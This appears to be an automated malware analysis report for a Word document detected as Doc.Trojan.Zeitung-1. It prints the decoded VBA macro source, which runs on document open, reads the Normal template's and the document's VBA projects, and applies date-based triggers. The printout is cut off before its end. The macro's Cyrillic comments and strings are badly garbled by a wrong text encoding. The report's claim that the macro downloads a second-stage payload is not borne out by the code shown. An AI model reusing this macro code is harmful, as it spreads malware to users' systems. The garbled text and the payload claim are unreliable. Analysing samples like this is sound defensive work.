Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cc9703df799f9798…

MALICIOUS

Office (OLE)

75.5 KB Created: 2002-09-17 08:31:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 3734058de8058ea9433445a5986a7fe3 SHA-1: 5d281bfc045fead39a8bf1c8aa3c4b5612e0e3f7 SHA-256: cc9703df799f97982d2a26a4a53407fe8e05577519af8cdbd96b5e14e436c988
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a malicious VBA macro that is automatically executed by the Document_Open subroutine. This macro is designed to download and execute a second-stage payload, as indicated by the ClamAV detection 'Doc.Trojan.Zeitung-1' and the presence of VBA code that manipulates the NormalTemplate and ActiveDocument VBProjects. The macro's intent is to compromise the user's system by fetching and running additional malicious code.

Heuristics 3

  • ClamAV: Doc.Trojan.Zeitung-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zeitung-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30345 bytes
SHA-256: 3fa2dc84df7e93872c9b96b35173d7e19942761803785392b8ff0978de372db1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const Signature = "VirusZeitung" '耔沩囹箴?忤痼襦
'梵 钿?狸溟皂疴觊 腙噤 翦? 栲胴螂釦吗耨玎?疣?栲羼?厘耥鹋痨忤条?噜
'2
'眍戾?2 玎 2000 泐
Dim sd, reg As Boolean
Private Function Kontaminat(O)
 If Not O.codemodule.Find(Signature, 1, 1, 100, 100) Then
  Kontaminat = 0
 Else
  If O.codemodule.countoflines < 50 Then
   Kontaminat = 0
  Else
   Ant$ = Trim(O.codemodule.lines(3, 1))
   Ant$ = Trim(Mid(Ant$, 2, Len(Ant$) - 1))
   If Val(Ant$) < 65535 Then
    Kontaminat = Val(Ant$)
   Else
    Kontaminat = -1
   End If
 End If
 End If
End Function
Private Sub Document_Open()
 On Error Resume Next
 Dim ad, nt As Object
 Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
 Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
 If Mid(ActiveDocument.Name, 1, 12) = "冷耜栝 钽铐? Then
  Exit Sub
 End If
 reg = False
 p = 0.05
 Tag$ = ""
 Monat$ = ""
 datum$ = Trim(Date)
 i = 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Tag$ = Tag$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 i = i + 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Monat$ = Monat$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then p = 2 ' 2  翦怵嚯�
 If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then p = 2 ' 21 爨痱
 If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then p = 2 ' 30 囡疱?
 If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then p = 2 ' 21 棹?
 If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then p = 2 ' 2  噔泱耱
 If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then p = 2 ' 21 皴眚�狃�
 If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then p = 2 ' 31 铌?狃�
 If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then p = 2 ' 21 溴赅狃�
 If Rnd >= p Then
  Exit Sub
 End If
 Documents.Add Template:="Normal", NewTemplate:=False
 With ActiveDocument.PageSetup
      .LineNumbering.Active = False
      .Orientation = wdOrientPortrait
      .TopMargin = CentimetersToPoints(1.5)
      .BottomMargin = CentimetersToPoints(1.5)
      .LeftMargin = CentimetersToPoints(2.5)
      .RightMargin = CentimetersToPoints(2)
      .Gutter = CentimetersToPoints(0)
      .HeaderDistance = CentimetersToPoints(1.25)
      .FooterDistance = CentimetersToPoints(1.25)
      .PageWidth = CentimetersToPoints(21)
      .PageHeight = CentimetersToPoints(29.7)
      .FirstPageTray = wdPrinterDefaultBin
      .OtherPagesTray = wdPrinterDefaultBin
      .SectionStart = wdSectionNewPage
      .OddAndEvenPagesHeaderFooter = False
      .DifferentFirstPageHeaderFooter = False
      .VerticalAlignment = wdAlignVerticalTop
      .SuppressEndnotes = False
      .MirrorMargins = False
 End With
 Druck_0 "??????  ?????, 40, True, wdAlignParagraphCenter, 0, False"
 Druck_0 "妈痼耥? 汔珏蜞 皴牝?桁. 逆. 蔫 ?? 叔腚?", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "蔓躅?镱 戾疱 觐祜脲牝钼囗? 眍戾疣", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "10 爨�  2000  ?   ?2 (2)", 18, False, wdAlignParagraphLeft, 0, True
 Selection.TypeParagraph
 Druck_0 "彦泐漤� ?眍戾疱:", 18, True, wdAlignParagraphLeft, 0, True
 Druck_0 "* 添屙? 麒蜞蝈脲??汔珏蝈. (项溽铕赅 桧蝈疴��)", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "* 橡邃腩驽龛� 镱 箅篦�屙�?疣犷螓 汔珏螓:", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** 帖 耦忮瘌屙耱怏屐 疋铋 忤痼?", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** 袜耔朦眍 扈?礤 狍溴��.", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** 砚铋 忤痼?- 疋铊扈 痼赅扈. ", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "** 帖 - 忄? 恹 - 磬?(?镳钺脲爨?钺疣蝽铋 疋�玷). ", 18, False, wdAlignParagraphLeft, 0, True
 Druck_0 "* 袜�� 镫囗?", 18, False, wdAlignParagraphLeft, 0, True
 Selection.TypeParagraph
 Druck_0 "******************************", 18, True, wdAlignParagraphCenter, 0, True
 Selection.TypeParagraph
 vb = 1
 ve = 1
 reg = True
 vb = Artikel_B(nt, vb, 1)
 ve = Artikel_E(nt, vb + 1)
 Selection.TypeParagraph
 Druck_0 nt.codem
... (truncated)